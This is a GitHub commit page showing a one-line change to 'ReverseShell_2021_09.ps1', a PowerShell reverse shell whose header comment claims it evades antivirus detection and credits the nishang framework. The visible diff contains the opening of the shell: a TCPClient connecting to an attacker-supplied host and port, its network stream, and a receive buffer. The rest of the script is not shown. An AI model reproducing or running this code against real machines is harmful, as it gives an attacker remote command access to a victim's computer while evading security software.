Skip to content

Commit

Permalink
Update ReverseShell_2021_09.ps1
Browse files Browse the repository at this point in the history
  • Loading branch information
tihanyin authored Oct 8, 2021
1 parent e254ab6 commit b4894ac
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions ReverseShell_2021_09.ps1
Original file line number Diff line number Diff line change
@@ -1,4 +1,5 @@
#Twitter: @TihanyiNorbert (No AV detecetion 2021 october)
#Based on the original nishang Framework written by @nikhil_mitt.
$c = New-Object System.Net.Sockets.TCPClient($args[0],$args[1]);
$I = $c.GetStream();
[byte[]]$U = 0..(2-shl15)|%{0};
Expand Down

0 comments on commit b4894ac

Please sign in to comment.